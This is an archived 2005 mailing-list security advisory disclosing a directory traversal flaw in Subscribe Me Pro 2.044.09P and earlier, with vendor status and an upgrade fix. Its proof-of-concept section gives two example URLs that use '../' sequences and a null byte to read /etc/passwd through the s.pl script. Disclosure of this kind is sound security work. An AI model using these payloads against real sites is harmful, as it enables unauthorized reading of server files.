lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <68cbfab105091305023a50c17@mail.gmail.com>
Date: Tue, 13 Sep 2005 17:32:27 +0530
From: h4cky0u <h4cky0u.org@...il.com>
To: full-disclosure@...ts.grok.org.uk
Cc: bugtraq@...urityfocus.com
Subject: Subscribe Me Pro 2.044.09P and prior Directory
	Traversal Vulnerability

--------------------------------------------------------------
HYA-2005-006 h4cky0u.org <http://h4cky0u.org> Advisory 007
--------------------------------------------------------------
Date - Tue Sep 13 2005


TITLE:
======

Subscribe Me Pro 2.044.09P and prior Directory Traversal Vulnerability


SEVERITY:
=========

High


SOFTWARE:
=========

Subscribe Me Pro 2.044.09P and prior

Support Website : http://siteinteractive.com/subpro/


INFO:
=====

Subscribe Me Professional is designed to assist with the building, 
maintaining, mailing, and tracking of your customer/prospect mailing lists.


BUG DESCRIPTION:
================

Subscribe Me Pro 2.044.09P and prior are prone to a directory traversal 
vulnerability. This issue is due to a failure in the application to properly 
sanitize user-supplied input. An unauthorized user can retrieve arbitrary 
files by supplying directory traversal strings '../' to the vulnerable 
parameter.


POC:
====

Here are some examples:

www.site.com/[dir]/s.pl?e=1&subscribe=subscribe&l=../../../../../../../../etc/passwd%00&SUBMIT=%20%20Submit%20%20<http://www.site.com/[dir]/s.pl?e=1&subscribe=subscribe&l=../../../../../../../../etc/passwd%00&SUBMIT=%20%20Submit%20%20>

www.site.com/[dir]/s.pl?e=enter%20your%20email%20address%20here&subscribe=subscribe&l=../../../../../../../../etc/passwd%00<http://www.site.com/[dir]/s.pl?e=enter%20your%20email%20address%20here&subscribe=subscribe&l=../../../../../../../../etc/passwd%00>


VENDOR STATUS:
==============

Vendor Contact : 13th Sep 2005
Vendor Reply : 13th sep 2005 - This Vulnerability has been fixed in the 
Latest Release : 2.050.01P


FIX:
====

Upgrade to version 2.050.01P


CREDITS:
========

This vulnerability was discovered and researched by -

ShoCK FX of h4cky0u Security Forums.


mail : shockfx at gmail.com <http://gmail.com>

web : http://www.h4cky0u.org


Co Researcher -

h4cky0u of h4cky0u Security Forums.


mail : h4cky0u at gmail.com <http://gmail.com>
web : http://www.h4cky0u.org
 ORIGINAL ADVISORY:
=================
 http://www.h4cky0u.org/advisories/HYA-2005-007-subscribe-me-pro.txt

-- 
http://www.h4cky0u.org
(In)Security at its best...

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ